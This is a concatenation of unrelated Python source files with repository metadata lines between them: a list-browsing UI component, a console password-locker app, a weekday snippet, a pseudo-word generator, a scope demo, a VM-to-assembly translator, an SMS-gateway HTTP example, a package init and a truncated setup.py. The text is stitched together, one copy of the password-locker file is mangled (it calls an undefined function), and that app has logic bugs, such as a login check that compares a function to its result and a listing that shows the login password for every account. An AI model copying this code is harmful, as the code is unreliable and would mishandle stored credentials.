        # Debounce item_activated notifications while scrolling quickly.
        if self.SELECTION_DELAY and self._delay_activation:
            self._activation_task = self._tasks.add(Task.sequence(Task.wait(self.SELECTION_DELAY), Task.run(self._scrollable_list.request_notify_item_activated)))
        else:
            self._scrollable_list.request_notify_item_activated()
        if not self._in_encoder_selection:
            self._selected_index_float = float(self._scrollable_list.selected_item_index)
    @encoders.value
    def encoders(self, value, encoder):
        self._add_offset_to_selected_index(value)
    def _add_offset_to_selected_index(self, offset):
        # Accumulate fractional encoder movement; select once it crosses an index.
        if self.is_enabled() and self._scrollable_list:
            with self._delay_activation():
                with self._in_encoder_selection():
                    self._selected_index_float = clamp(self._selected_index_float + offset * self.ENCODER_FACTOR, 0, len(self._scrollable_list.items))
                    self._scrollable_list.select_item_index_with_border(int(self._selected_index_float), 1)
    @action_button.pressed
    def action_button(self, button):
        # Pressing the button acts on the "next" item when the selected one
        # was just actioned, otherwise on the selected item itself.
        if self._current_action_item == None:
            self._trigger_action(self.next_item if self._action_target_is_next_item() else self.selected_item)
        return
    def do_trigger_action(self, item):
        item.action()
        self.notify_item_action(item)
    def _trigger_action(self, item):
        # Mark the item as pending and let the deferred task execute it so the
        # UI can show the in-progress state first.
        if self.is_enabled() and self._can_be_used_for_action(item):
            if self._scrollable_list != None:
                self._scrollable_list.select_item(item)
            self._current_action_item = item
            self.update()
            self._execute_action_task.restart()
        return
    def _execute_action(self):
        """ Is called by the execute action task and should not be called directly
        use _trigger_action instead """
        if self._current_action_item != None:
            self.do_trigger_action(self._current_action_item)
            self._last_action_item = self._current_action_item
            self._current_action_item = None
            self.update()
        return
    @property
    def selected_item(self):
        return self._scrollable_list.selected_item if self._scrollable_list != None else None
    @property
    def next_item(self):
        # The item just after the selection, or None at the end of the list.
        item = None
        if self._scrollable_list != None:
            all_items = self._scrollable_list.items
            next_index = self._scrollable_list.selected_item_index + 1
            item = all_items[next_index] if in_range(next_index, 0, len(all_items)) else None
        return item
    def _can_be_used_for_action(self, item):
        # An item is actionable unless it was the one most recently actioned.
        return item != None and item.supports_action and item != self.last_action_item()
    def _action_target_is_next_item(self):
        return self.selected_item == self.last_action_item() and self._can_be_used_for_action(self.next_item)
    def _update_action_feedback(self):
        # Pick the action-button colour reflecting what a press would do.
        color = 'Browser.Loading'
        if self._current_action_item == None:
            if self._action_target_is_next_item():
                color = 'Browser.LoadNext'
            elif self._can_be_used_for_action(self.selected_item):
                color = 'Browser.Load'
            else:
                color = 'Browser.LoadNotPossible'
        self.action_button.color = color
        return
    def _update_display(self):
        # Render one formatted string per data source row.
        visible_items = self._scrollable_list.visible_items if self._scrollable_list else []
        for index, data_source in enumerate(self._data_sources):
            item = visible_items[index] if index < len(visible_items) else None
            action_in_progress = item and item == self._current_action_item
            display_string = self.item_formatter(index, item, action_in_progress)
            data_source.set_display_string(display_string)
        if not visible_items and self._data_sources and self.empty_list_message:
            self._data_sources[0].set_display_string(self.empty_list_message)
        return
    def update(self):
        super(ListComponent, self).update()
        if self.is_enabled():
            self._update_action_feedback()
            self._update_display()
ed7f640db0df0ad410d1d1d529fb36cc323cbfe7 | 7,376 | py | Python | interface.py | wangechimk/password-locker | 098e8ea3fd5f145416acd897f66e6e48ab94fad6 | [
"MIT"
] | null | null | null | interface.py | wangechimk/password-locker | 098e8ea3fd5f145416acd897f66e6e48ab94fad6 | [
"MIT"
] | null | null | null | interface.py | wangechimk/password-locker | 098e8ea3fd5f145416acd897f66e6e48ab94fad6 | [
"MIT"
] | null | null | null | from locker import User, Credentials
function()
def create_user(username, password):
'''
Function to create a new user with a username and password
'''
return User(username, password)
def save_user(user):
'''
Function to save a new user
'''
user.save_user()
def display_user():
"""
Function to display existing user
"""
return User.display_user()
def create_new_credential(account, userName, password):
"""
Function that creates new credentials for a given user account
"""
return Credentials(account, userName, password)
def save_credentials(credentials):
"""
Function to save Credentials
"""
credentials.save_credential()
def display_accounts_details():
"""
Function that returns all the saved credential.
"""
return Credentials.display_credentials()
def del_credential(credentials):
"""
Function to delete a Credentials from credentials list
"""
credentials.delete_credentials()
def find_credential(account):
"""
Function that finds a Credentials by an account name and returns the Credentials that belong to that account
"""
return Credentials.find_credential(account)
def check_credentials(account):
"""
Function that check if a Credentials exists with that account name and return true or false
"""
return Credentials.if_credential_exist(account)
def generate_Password():
'''
generates a random password for the user.
'''
return Credentials.generate_random_password()
if __name__ == '__main__':
locker()
| 35.12381 | 142 | 0.539317 | from locker import User, Credentials
def function():
    """Print the ASCII-art banner shown when the app starts."""
    banner = (
        " __ __ __ ",
        "| | | | | | ",
        "| |__| | | | ",
        "| __ | | | ",
        "| | | | | | ",
        "|__| |__| |__| ",
    )
    for row in banner:
        print(row)
function()
def create_user(username, password):
    '''
    Build (but do not persist) a new User with the given username and password.
    '''
    return User(username, password)
def save_user(user):
    '''
    Persist the given User via its own save_user() method.
    '''
    user.save_user()
def display_user():
    """
    Return the existing users, as reported by User.display_user().
    """
    return User.display_user()
def login_user(username, password):
    """
    Build a User from the given credentials and attempt a login,
    returning whatever User.login() returns.
    """
    return User(username, password).login()
def create_new_credential(account, userName, password):
    """
    Build (but do not persist) a Credentials record for the given account.
    """
    return Credentials(account, userName, password)
def save_credentials(credentials):
    """
    Persist the given Credentials via its own save_credential() method.
    """
    credentials.save_credential()
def display_accounts_details():
    """
    Return all saved credentials, as reported by Credentials.display_credentials().
    """
    return Credentials.display_credentials()
def del_credential(credentials):
    """
    Remove the given Credentials record via its delete_credentials() method.
    """
    credentials.delete_credentials()
def find_credential(account):
    """
    Look up and return the Credentials stored under the given account name.
    """
    return Credentials.find_credential(account)
def check_credentials(account):
    """
    Return the truthy/falsy result of Credentials.if_credential_exist for
    the given account name (i.e. whether such a credential exists).
    """
    return Credentials.if_credential_exist(account)
def generate_Password():
    '''
    Return a random password produced by Credentials.generate_random_password().
    '''
    return Credentials.generate_random_password()
def locker():
    """Interactive console loop: sign up or log in, then manage credentials."""
    print(
        "Hello Welcome to your Accounts credentials store 🤖 ...\n 1."
        " Create New Account ----- CA \n 2. Have An Account -------- LI \n"
    )
    short_code = input("").lower().strip()
    if short_code == "ca":
        print("Sign Up")
        print('*' * 50)
        username = input("User_name: ")
        # Loop until the user either types a password or asks for a generated one.
        while True:
            print(" TP - To type your own password:\n GP - To generate random Password")
            password_Choice = input().lower().strip()
            if password_Choice == 'tp':
                password = input("Enter Password\n")
                break
            elif password_Choice == 'gp':
                password = generate_Password()
                break
            else:
                print("Invalid password please try again")
        save_user(create_user(username, password))
        print("*" * 50)
        print(f"Hello {username}, Your account has been created successfully 💯 ! Your password is: {password}")
        print('\n')
    elif short_code == "li":
        print("*" * 50)
        print("Enter your User name and your Password to log in:")
        print('*' * 50)
        username = input("User name: ")
        password = input("password: ")
        login = login_user(username, password)
        # NOTE(review): this compares the login_user FUNCTION object to the
        # login result, which is never True for a normal User.login() return;
        # it looks like `if login:` was intended — confirm. A failed branch
        # here silently ends the function (no else for this if).
        if login_user == login:
            print(f"Hello {username}.Welcome To Password-locker 👋 †")
            print('\n')
            print("what would you like to do?")
            print('\n')
            while True:
                print(
                    "Use these short codes:\n CC - "
                    "Create a new credential \n DC - Display Credentials \n FC - Find a credential \n GP"
                    " - Generate A random password \n D - Delete credential \n EX - Exit the application \n"
                )
                short_code = input().lower().strip()
                if short_code == 'cc':
                    print("Create New Credential")
                    print("." * 20)
                    print("Account name ....")
                    account = input().capitalize()
                    print("Your Account username")
                    user_Name = input()
                    while True:
                        print(" TP - To type your own password:\n GP - To generate random Password")
                        password_Choice = input().lower().strip()
                        if password_Choice == 'tp':
                            password = input("Enter Password\n")
                            break
                        elif password_Choice == 'gp':
                            password = generate_Password()
                            break
                        # NOTE(review): `!= 'tp' or 'gp'` is parsed as
                        # (password_Choice != 'tp') or ('gp'); the right side is
                        # always truthy, so this branch always fires here and the
                        # final else below is unreachable — confirm intent.
                        elif password_Choice != 'tp' or 'gp':
                            print("Invalid password please try again")
                            break
                        else:
                            print("Invalid password please try again")
                    save_credentials(Credentials(account, user_Name, password))
                    print('\n')
                    print(f"New Credential : {account} UserName: {user_Name} Password:{password} created successfully 🤓 ")
                    print('\n')
                elif short_code == "dc":
                    if display_accounts_details():
                        print("Here's your list of account(s):🗒️ ")
                        print('_' * 30)
                        # NOTE(review): prints the LOGIN username/password for every
                        # account instead of the credential's own user name and
                        # password — probably should use account.username/.password.
                        for account in display_accounts_details():
                            print(f" Account:{account.credential} \n User Name:{username}\n Password:{password}")
                        print('_' * 30)
                        print('*' * 30)
                    else:
                        print("You don't have any credentials saved yet..........")
                elif short_code == "fc":
                    print("Enter the Account Name you want to search for")
                    search_name = input().capitalize()
                    if find_credential(search_name):
                        search_credential = find_credential(search_name)
                        print(f"Account Name : {search_credential.credential}")
                        print('-' * 50)
                        print(f"User Name: {search_credential.username} Password :{search_credential.password}")
                    else:
                        print("That Credential does not exist 🤡 ")
                        print('\n')
                elif short_code == "d":
                    print("Enter the account name of the Credentials you want to delete")
                    search_name = input().capitalize()
                    if check_credentials(search_name):
                        search_credential = find_credential(search_name)
                        print(f"{search_credential.credential}")
                        print("_" * 30)
                        search_credential.delete_credentials()
                        print('\n')
                        print(f"New Credential : {search_credential.credential} UserName: {search_credential.username} successfully deleted !!!")
                        print('\n')
                    else:
                        print("That Credential does not exist 🌚 ")
                elif short_code == 'gp':
                    password = generate_Password()
                    print(f" {password} Has been generated successfully. You can proceed to use it to your account 👍 ")
                elif short_code == 'ex':
                    print("Thanks for using passwords store manager.. See you next time!😃 ")
                    break
                else:
                    print("Check your entry again and let it match those in the menu")
    else:
        print("Please enter a valid input to continue ❌ ")
if __name__ == '__main__':
locker()
| 5,739 | 0 | 69 |
d6ca7107dca220bd065ae762b2e3cc75fdc14130 | 151 | py | Python | instructors/lessons/practical_utils/examples/in_class/1_answer_ashwini.py | mgadagin/PythonClass | 70b370362d75720b3fb0e1d6cc8158f9445e9708 | [
"MIT"
] | 46 | 2017-09-27T20:19:36.000Z | 2020-12-08T10:07:19.000Z | instructors/lessons/practical_utils/examples/in_class/1_answer_ashwini.py | mgadagin/PythonClass | 70b370362d75720b3fb0e1d6cc8158f9445e9708 | [
"MIT"
] | 6 | 2018-01-09T08:07:37.000Z | 2020-09-07T12:25:13.000Z | instructors/lessons/practical_utils/examples/in_class/1_answer_ashwini.py | mgadagin/PythonClass | 70b370362d75720b3fb0e1d6cc8158f9445e9708 | [
"MIT"
] | 18 | 2017-10-10T02:06:51.000Z | 2019-12-01T10:18:13.000Z | import datetime
dt = '21/03/2012'
day, month, year = (int(x) for x in dt.split('/'))
ans = datetime.date(year, month, day)
print ans.strftime("%A") | 30.2 | 54 | 0.642384 | import datetime
dt = '21/03/2012'
day, month, year = (int(x) for x in dt.split('/'))
ans = datetime.date(year, month, day)
print ans.strftime("%A") | 0 | 0 | 0 |
e621b823641691f1b5003f94127d4245a6724492 | 429 | py | Python | 011.RemoveElement.py | br71/challenges | 355cd4984cf5e7f81827f306841ddc7b9382a820 | [
"Apache-2.0"
] | null | null | null | 011.RemoveElement.py | br71/challenges | 355cd4984cf5e7f81827f306841ddc7b9382a820 | [
"Apache-2.0"
] | null | null | null | 011.RemoveElement.py | br71/challenges | 355cd4984cf5e7f81827f306841ddc7b9382a820 | [
"Apache-2.0"
] | null | null | null |
nums = [2,1,0,1,2,2,3,0,4,2]
val = 2
s = Solution()
print(s.removeElement(nums,val)) | 15.888889 | 44 | 0.391608 | class Solution:
def removeElement(self,nums,val) -> int:
i = 0
j = len(nums)
while True:
if nums[i] == val:
del nums[i]
j = j - 1
else:
i = i +1
if i == j:
break
print (nums)
return i
nums = [2,1,0,1,2,2,3,0,4,2]
val = 2
s = Solution()
print(s.removeElement(nums,val)) | 300 | -6 | 48 |
285a7dd054f231627b9c6e65b8de5c6c71ff61dc | 2,861 | py | Python | plentshwoitre.py | jedav/plentshwoitre | 0fda2efdf0d3eef4f5d9735a12ff35b907b1d362 | [
"MIT"
] | 2 | 2020-02-23T20:44:08.000Z | 2020-12-10T17:12:08.000Z | plentshwoitre.py | jedav/plentshwoitre | 0fda2efdf0d3eef4f5d9735a12ff35b907b1d362 | [
"MIT"
] | null | null | null | plentshwoitre.py | jedav/plentshwoitre | 0fda2efdf0d3eef4f5d9735a12ff35b907b1d362 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import argparse
import random
onsets = [
"b",
"c",
"d",
"f",
"g",
"h",
"j",
"k",
"l",
"m",
"n",
"p",
"r",
"s",
"t",
"v",
"w",
"pl",
"bl",
"kl",
"ɡl",
"pr",
"br",
"tr",
"dr",
"kr",
"ɡr",
"tw",
"dw",
"ɡw",
"kw",
"pw",
"fl",
"sl",
"dʒ",
"θl",
"fr",
"θr",
"ʃr",
"hw",
"sw",
"θw",
"vw",
"pj",
"bj",
"tj",
"dj",
"kj",
"ɡj",
"mj",
"nj",
"fj",
"vj",
"θj",
"sj",
"zj",
"hj",
"lj",
"sp",
"st",
"sk",
"sm",
"sn",
"sf",
"sθ",
"spl",
"skl",
"spr",
"str",
"skr",
"skw",
"smj",
"spj",
"stj",
"skj",
"sfr",
]
nuclei = [
"a",
"e",
"i",
"o",
"u",
"oo",
"ui",
"oi",
"ai",
"ae",
"ee",
"ei",
"ie",
]
codas = [
"b",
"c",
"d",
"f",
"g",
"k",
"l",
"m",
"n",
"p",
"r",
"s",
"t",
"v",
"ŋ",
"lp",
"lb",
"lt",
"ld",
"ltʃ",
"ldʒ",
"lk",
"rp",
"rb",
"rt",
"rd",
"rtʃ",
"rdʒ",
"rk",
"rɡ",
"lf",
"lv",
"lθ",
"ls",
"lʃ",
"rf",
"rv",
"rθ",
"rs",
"rz",
"rʃ",
"lm",
"ln",
"rm",
"rn",
"rl",
"mp",
"nt",
"nd",
"ntʃ",
"ndʒ",
"ŋk",
"mf",
"mθ",
"nθ",
"ns",
"nz",
"ŋθ",
"ft",
"sp",
"st",
"sk",
"fθ",
"pt",
"kt",
"pθ",
"ps",
"tθ",
"ts",
"dθ",
"ks",
"lpt",
"lps",
"lfθ",
"lts",
"lst",
"lkt",
"lks",
"rmθ",
"rpt",
"rps",
"rts",
"rst",
"rkt",
"mpt",
"mps",
"ndθ",
"ŋkt",
"ŋks",
"ŋkθ",
"ksθ",
"kst",
]
if __name__ == "__main__":
main()
| 12.226496 | 93 | 0.47396 | #!/usr/bin/env python3
import argparse
import random
onsets = [
"b",
"c",
"d",
"f",
"g",
"h",
"j",
"k",
"l",
"m",
"n",
"p",
"r",
"s",
"t",
"v",
"w",
"pl",
"bl",
"kl",
"ɡl",
"pr",
"br",
"tr",
"dr",
"kr",
"ɡr",
"tw",
"dw",
"ɡw",
"kw",
"pw",
"fl",
"sl",
"dʒ",
"θl",
"fr",
"θr",
"ʃr",
"hw",
"sw",
"θw",
"vw",
"pj",
"bj",
"tj",
"dj",
"kj",
"ɡj",
"mj",
"nj",
"fj",
"vj",
"θj",
"sj",
"zj",
"hj",
"lj",
"sp",
"st",
"sk",
"sm",
"sn",
"sf",
"sθ",
"spl",
"skl",
"spr",
"str",
"skr",
"skw",
"smj",
"spj",
"stj",
"skj",
"sfr",
]
nuclei = [
"a",
"e",
"i",
"o",
"u",
"oo",
"ui",
"oi",
"ai",
"ae",
"ee",
"ei",
"ie",
]
codas = [
"b",
"c",
"d",
"f",
"g",
"k",
"l",
"m",
"n",
"p",
"r",
"s",
"t",
"v",
"ŋ",
"lp",
"lb",
"lt",
"ld",
"ltʃ",
"ldʒ",
"lk",
"rp",
"rb",
"rt",
"rd",
"rtʃ",
"rdʒ",
"rk",
"rɡ",
"lf",
"lv",
"lθ",
"ls",
"lʃ",
"rf",
"rv",
"rθ",
"rs",
"rz",
"rʃ",
"lm",
"ln",
"rm",
"rn",
"rl",
"mp",
"nt",
"nd",
"ntʃ",
"ndʒ",
"ŋk",
"mf",
"mθ",
"nθ",
"ns",
"nz",
"ŋθ",
"ft",
"sp",
"st",
"sk",
"fθ",
"pt",
"kt",
"pθ",
"ps",
"tθ",
"ts",
"dθ",
"ks",
"lpt",
"lps",
"lfθ",
"lts",
"lst",
"lkt",
"lks",
"rmθ",
"rpt",
"rps",
"rts",
"rst",
"rkt",
"mpt",
"mps",
"ndθ",
"ŋkt",
"ŋks",
"ŋkθ",
"ksθ",
"kst",
]
def gen_syllable(prob_onset=0.6, prob_coda=0.8):
    """Build one random syllable from the module-level onsets/nuclei/codas pools.

    :param prob_onset: probability the syllable starts with an onset cluster
    :param prob_coda: probability the syllable ends with a coda cluster
    :return: onset + nucleus + coda as a single string (nucleus is always present)
    """
    has_onset = random.random() < prob_onset
    onset = random.choice(onsets) if has_onset else ""
    has_coda = random.random() < prob_coda
    coda = random.choice(codas) if has_coda else ""
    nucleus = random.choice(nuclei)
    print((onset, nucleus, coda))  # NOTE(review): debug print left in; consider removing
    return onset+nucleus+coda
def pick_probs(word_so_far, num_syllables):
    """Choose (onset, coda) probabilities for the next syllable.

    Longer words get sparser syllables. If the word so far ends in a bare
    vowel (previous syllable had no coda), the next syllable must take an
    onset so adjacent vowel sounds never pile up.
    """
    base = 1.2 / (1 + num_syllables)
    ends_in_vowel = bool(word_so_far) and word_so_far[-1] in "aeiou"
    onset_prob = 1.0 if ends_in_vowel else base
    return (onset_prob, base)
def gen_word():
    """Generate one pseudo-word of 1-3 syllables (shorter words weighted heavier)."""
    num_syllables = random.choice([1,1,1,1,2,2,3])
    outword = ""
    for _ in range(num_syllables):
        # probabilities depend on word length and on whether we just ended in a vowel
        (prob_onset, prob_coda) = pick_probs(outword, num_syllables)
        outword += gen_syllable(prob_onset=prob_onset, prob_coda=prob_coda)
    return outword
def main():
    """CLI entry point: print the requested number of generated words."""
    parser = argparse.ArgumentParser(description="Generate 'words' using english phonotactics")
    # type=int: argparse yields strings by default, so range(args.num_words)
    # raised TypeError whenever -n was actually passed on the command line.
    parser.add_argument("-n", "--num_words", type=int, default=5,
                        help="Number of 'words' to generate")
    args = parser.parse_args()
    for _ in range(args.num_words):
        print(gen_word())
if __name__ == "__main__":
main()
| 1,181 | 0 | 92 |
8db9f1005f6ba3b0c94e86e59866a00dacf65a7b | 525 | py | Python | 20-functions/scope.py | ehsankorhani/python-lessons | a1974cb2b43b73751fc4737e3e3aa830aa16a644 | [
"MIT"
] | null | null | null | 20-functions/scope.py | ehsankorhani/python-lessons | a1974cb2b43b73751fc4737e3e3aa830aa16a644 | [
"MIT"
] | null | null | null | 20-functions/scope.py | ehsankorhani/python-lessons | a1974cb2b43b73751fc4737e3e3aa830aa16a644 | [
"MIT"
] | null | null | null | # def f():
# print (x, id(x))
# x = 99
# print (x, id(x))
# f()
# # ----------------
# def f():
# x = 100
# print (x, id(x))
# f()
# # print (x)
# # ----------------
# def f():
# x = 100
# print (x, id(x))
# x = 99
# print (x, id(x))
# f()
# print (x, id(x))
# # ----------------
# def f():
# x = 100
# print (x, id(x))
# def y():
# print (x, id(x))
# y()
# f()
# # ----------------
x = 99
f()
print (x, id(x)) | 10.294118 | 26 | 0.300952 | # def f():
# print (x, id(x))
# x = 99
# print (x, id(x))
# f()
# # ----------------
# def f():
# x = 100
# print (x, id(x))
# f()
# # print (x)
# # ----------------
# def f():
# x = 100
# print (x, id(x))
# x = 99
# print (x, id(x))
# f()
# print (x, id(x))
# # ----------------
# def f():
# x = 100
# print (x, id(x))
# def y():
# print (x, id(x))
# y()
# f()
# # ----------------
x = 99
def f():
    # Rebind the *module-level* x (without `global` this would create a local).
    global x
    x = 100
    print (x, id(x))
f()
print (x, id(x)) | 33 | 0 | 23 |
4cdcaba19b94f24b30f90160f4d645dfc15fbb94 | 359 | py | Python | ex033guanabara.py | BrunosVieira88/Python | 7dc105a62ede0b33d25c5864e892637ca71f2beb | [
"MIT"
] | null | null | null | ex033guanabara.py | BrunosVieira88/Python | 7dc105a62ede0b33d25c5864e892637ca71f2beb | [
"MIT"
] | null | null | null | ex033guanabara.py | BrunosVieira88/Python | 7dc105a62ede0b33d25c5864e892637ca71f2beb | [
"MIT"
] | null | null | null | n1=int(input('digite um numero'))
n2=int(input('digite um numero'))
n3=int(input('digite um numero'))
maior = n1
if n2 > n1 and n2 > n3 :
maior = n2
if n3 > n1 and n3 >n2 :
maior = n3
menor = n1
if n2 < n1 and n2 < n3 :
menor = n2
if n3 < n1 and n3 < n2 :
menor = n3
print ('{} é o MAIOR'.format(maior))
print ('{} é o MENOR'.format(menor)) | 19.944444 | 36 | 0.590529 | n1=int(input('digite um numero'))
n2=int(input('digite um numero'))
n3=int(input('digite um numero'))
# Determine the largest and smallest of the three values read above.
# max()/min() also fix the original tie bug: with strict comparisons,
# e.g. n1=1, n2=5, n3=5 left `maior` at n1.
maior = max(n1, n2, n3)
menor = min(n1, n2, n3)
print ('{} é o MAIOR'.format(maior))
print ('{} é o MENOR'.format(menor)) | 0 | 0 | 0 |
1592d18a13e759416b2fd68ded0e59434dc5f0a7 | 2,645 | py | Python | VMTranslator.py | jamespolley/VM-Translator | 2d573f5234d956a5fe4d5b9c607b4e98e04b403e | [
"MIT"
] | 1 | 2022-02-21T13:56:28.000Z | 2022-02-21T13:56:28.000Z | VMTranslator.py | jamespolley/VM-Translator | 2d573f5234d956a5fe4d5b9c607b4e98e04b403e | [
"MIT"
] | null | null | null | VMTranslator.py | jamespolley/VM-Translator | 2d573f5234d956a5fe4d5b9c607b4e98e04b403e | [
"MIT"
] | null | null | null | # To Do: improve docstrings
from Parser import Parser
from CodeWriter import CodeWriter
import sys
import os
class VMTranslator:
"""
Main class. Handles input, reads the VM file, writes to the assembly file, and drives the VM translation process.
"""
@staticmethod
@staticmethod
@staticmethod
@staticmethod
@staticmethod
if __name__ == "__main__":
if len(sys.argv) < 2:
raise Exception() # To Do - elaborate
else:
input_files = sys.argv[1]
output_file = sys.argv[2]
vmt = VMTranslator(input_files, output_file) | 32.654321 | 117 | 0.612476 | # To Do: improve docstrings
from Parser import Parser
from CodeWriter import CodeWriter
import sys
import os
class VMTranslator:
    """
    Main class. Handles input, reads the VM file, writes to the assembly file, and drives the VM translation process.
    """
    def __init__(self, input, include_comments=True, include_init_code=True):
        """`input` is a single .vm file path or a directory containing .vm files.

        :param include_comments: pass-through flag for CodeWriter's commented output
        :param include_init_code: emit the VM bootstrap/init code first
        """
        self.file_path = self.get_file_path(input)
        self.input_files = self.process_input(input, self.file_path)
        # (the original recomputed self.file_path a second time here; redundant)
        self.output_file = self.get_output_file(self.file_path)
        self.include_comments = include_comments
        self.include_init_code = include_init_code

    def translate(self):
        """Parse every collected .vm file and emit one combined .asm file."""
        code_writer = CodeWriter(None,
            include_comments=self.include_comments)
        if self.include_init_code:
            code_writer.generate_init()
        for f in self.input_files:
            vm_code = self.read(f)
            parser = Parser(vm_code)
            # strip the (Windows-style) directory part and the ".vm" suffix
            code_writer.set_current_file_name(f.split("\\")[-1][:-3])
            while parser.has_next():
                parser.advance()
                parsed_line = parser.parse_current_line()
                if not parsed_line: continue
                code_writer.generate_command(parsed_line)
        code_writer.generate_end()
        output_file_path = os.path.join(
            self.file_path, self.output_file)
        # NOTE(review): assumes CodeWriter yields its lines when iterated — confirm
        self.write(output_file_path, code_writer)

    @staticmethod
    def process_input(input, file_path):
        """Return the .vm files to translate: the file itself, or every .vm in the directory."""
        input_files = []
        if os.path.isfile(input):
            input_files.append(input)
        else:
            for f in os.listdir(input):
                if f.endswith(".vm"):
                    input_files.append(os.path.join(file_path, f))
        return input_files

    @staticmethod
    def get_file_path(input):
        """Return `input` itself for a directory, otherwise its containing directory."""
        if os.path.isdir(input):
            return input
        return os.path.dirname(input)

    @staticmethod
    def get_output_file(file_path):
        """Derive the .asm name from the last (Windows-style) path component."""
        return file_path.split("\\")[-1] + ".asm"

    @staticmethod
    def read(vm_file_path):
        """Return the file's lines with newlines preserved."""
        with open(vm_file_path) as f:
            return f.readlines()

    @staticmethod
    def write(asm_file_path, asm_code):
        """Write each line of `asm_code`, newline-terminated."""
        with open(asm_file_path, "w") as f:
            for line in asm_code:
                f.write(line + "\n")
if __name__ == "__main__":
if len(sys.argv) < 2:
raise Exception() # To Do - elaborate
else:
input_files = sys.argv[1]
output_file = sys.argv[2]
vmt = VMTranslator(input_files, output_file) | 1,850 | 0 | 188 |
d4c9e01d80c78bb98917cb8816051aa01abb469d | 728 | py | Python | misc/doc/sources/apis/ja-http/example_send_misc.py | ibsindsrt/Jasmin-SMPP | 0645b892e5c6a2eb436bb15c019fffa5d13898c0 | [
"Apache-2.0"
] | null | null | null | misc/doc/sources/apis/ja-http/example_send_misc.py | ibsindsrt/Jasmin-SMPP | 0645b892e5c6a2eb436bb15c019fffa5d13898c0 | [
"Apache-2.0"
] | null | null | null | misc/doc/sources/apis/ja-http/example_send_misc.py | ibsindsrt/Jasmin-SMPP | 0645b892e5c6a2eb436bb15c019fffa5d13898c0 | [
"Apache-2.0"
] | null | null | null | # Python example
# http://jasminsms.com
import urllib2
import urllib
baseParams = {'username':'foo', 'password':'bar', 'to':'+336222172', 'content':'Hello'}
# Sending long content (more than 160 chars):
baseParams['content'] = 'Very long message ....................................................................................................................................................................................'
urllib2.urlopen("http://127.0.0.1:1401/send?%s" % urllib.urlencode(baseParams)).read()
# Sending UCS2 (UTF-16) arabic content
baseParams['content'] = '\x06\x23\x06\x31\x06\x46\x06\x28'
baseParams['coding'] = 8
urllib2.urlopen("http://127.0.0.1:1401/send?%s" % urllib.urlencode(baseParams)).read()
| 45.5 | 224 | 0.53022 | # Python example
# http://jasminsms.com
import urllib2
import urllib
baseParams = {'username':'foo', 'password':'bar', 'to':'+336222172', 'content':'Hello'}
# Sending long content (more than 160 chars):
baseParams['content'] = 'Very long message ....................................................................................................................................................................................'
urllib2.urlopen("http://127.0.0.1:1401/send?%s" % urllib.urlencode(baseParams)).read()
# Sending UCS2 (UTF-16) arabic content
baseParams['content'] = '\x06\x23\x06\x31\x06\x46\x06\x28'
baseParams['coding'] = 8
urllib2.urlopen("http://127.0.0.1:1401/send?%s" % urllib.urlencode(baseParams)).read()
| 0 | 0 | 0 |
db581a7f7fcb3566e2addad4b3945f995686c5f1 | 39 | py | Python | proj_template/__init__.py | masmangan/proj-template | 4d2b26cfc59d1df00d181c7a5073eb88fba48b36 | [
"MIT"
] | null | null | null | proj_template/__init__.py | masmangan/proj-template | 4d2b26cfc59d1df00d181c7a5073eb88fba48b36 | [
"MIT"
] | null | null | null | proj_template/__init__.py | masmangan/proj-template | 4d2b26cfc59d1df00d181c7a5073eb88fba48b36 | [
"MIT"
] | null | null | null | """Initialize proj-template module."""
| 19.5 | 38 | 0.717949 | """Initialize proj-template module."""
| 0 | 0 | 0 |
626d721b04010a74c03b4b5c03b52f130af3c1b2 | 602 | py | Python | src/pkgcheck/__init__.py | CyberTailor/pkgcheck | 7a20b0eb6aad70cf88e085632261a1830b50e568 | [
"BSD-3-Clause"
] | null | null | null | src/pkgcheck/__init__.py | CyberTailor/pkgcheck | 7a20b0eb6aad70cf88e085632261a1830b50e568 | [
"BSD-3-Clause"
] | null | null | null | src/pkgcheck/__init__.py | CyberTailor/pkgcheck | 7a20b0eb6aad70cf88e085632261a1830b50e568 | [
"BSD-3-Clause"
] | null | null | null | from importlib import import_module as _import
from .api import keywords, scan
from .base import PkgcheckException
from .results import Result
__all__ = ('keywords', 'scan', 'PkgcheckException', 'Result')
__title__ = 'pkgcheck'
__version__ = '0.10.10'
def __getattr__(name):
"""Provide import access to keyword classes."""
if name in keywords:
return keywords[name]
try:
return _import('.' + name, __name__)
except ImportError:
raise AttributeError(f'module {__name__} has no attribute {name}')
| 24.08 | 74 | 0.699336 | from importlib import import_module as _import
from .api import keywords, scan
from .base import PkgcheckException
from .results import Result
__all__ = ('keywords', 'scan', 'PkgcheckException', 'Result')
__title__ = 'pkgcheck'
__version__ = '0.10.10'
def __getattr__(name):
    """Provide import access to keyword classes.

    Known keyword (result) classes resolve straight from the registry;
    anything else falls back to importing a submodule of this package.
    """
    if name in keywords:
        return keywords[name]
    try:
        return _import('.' + name, __name__)
    except ImportError:
        raise AttributeError(f'module {__name__} has no attribute {name}')
def __dir__():
    # Advertise the declared public API plus every keyword class for dir()/completion.
    return sorted(__all__ + tuple(keywords))
| 38 | 0 | 23 |
e94dfbcace5ad7158b789cb626816432909e8ed2 | 962 | py | Python | setup.py | deepomicslab/SuperTLD | 92e70c03cb59283d0c11e6b775fd90d1dee486b3 | [
"MIT"
] | null | null | null | setup.py | deepomicslab/SuperTLD | 92e70c03cb59283d0c11e6b775fd90d1dee486b3 | [
"MIT"
] | null | null | null | setup.py | deepomicslab/SuperTLD | 92e70c03cb59283d0c11e6b775fd90d1dee486b3 | [
"MIT"
] | null | null | null | # _*_ coding: utf-8 _*_
"""
Time: 2022/3/7 15:37
Author: ZHANG Yuwei
Version: V 0.2
File: setup.py
Describe:
"""
import setuptools
# Reads the content of your README.md into a variable to be used in the setup below
with open("./README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name='supertld',
version='0.0.2',
license='MIT',
description='SuperTLD: Detecting TAD-like domains from RNA-associated interactions',
long_description=long_description, # loads your README.md
long_description_content_type="text/markdown", # README.md is of type 'markdown'
author='Yu Wei Zhang',
author_email='ywzhang224@gmail.com',
url='https://github.com/deepomicslab/SuperTLD',
packages=setuptools.find_packages(),
classifiers=[ # https://pypi.org/classifiers
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
],
) | 31.032258 | 89 | 0.655925 | # _*_ coding: utf-8 _*_
"""
Time: 2022/3/7 15:37
Author: ZHANG Yuwei
Version: V 0.2
File: setup.py
Describe:
"""
import setuptools
# Reads the content of your README.md into a variable to be used in the setup below
with open("./README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name='supertld',
version='0.0.2',
license='MIT',
